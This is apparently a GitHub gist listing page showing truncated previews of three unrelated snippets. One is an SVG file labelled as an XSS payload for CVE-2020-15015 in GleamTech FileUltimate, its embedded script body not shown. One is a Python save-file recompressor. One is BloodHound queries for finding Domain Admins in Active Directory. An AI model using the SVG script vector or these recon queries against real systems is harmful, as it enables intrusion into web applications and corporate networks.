Skip to content

Instantly share code, notes, and snippets.

chppppp / xss.svg.txt
Last active June 24, 2020 16:29
CVE-2020-15015 GleamTech FileUltimate - XSS in SVG payload
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "">
<svg version="1.1" baseProfile="full" xmlns="">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
#!/usr/bin/env python3
# Python 3 code that will read, decompress, and then recompress the UE4 game
# save file that Astroneer uses.
# Though I wrote this for tinkering with Astroneer games saves, it's probably
# generic to the Unreal Engine 4 compressed saved game format.
import zlib
import sys
chppppp / customqueries.json
Created September 6, 2019 04:48 — forked from seajaysec/customqueries.json
bloodhound custom queries - there may be dupes
"queries": [
"name": "Find all Domain Admins",
"queryList": [
"final": true,
"MATCH (n:Group) WHERE n.objectsid =~ {name} WITH n MATCH p=(n)<-[r:MemberOf*1..]-(m) RETURN p",
"props": {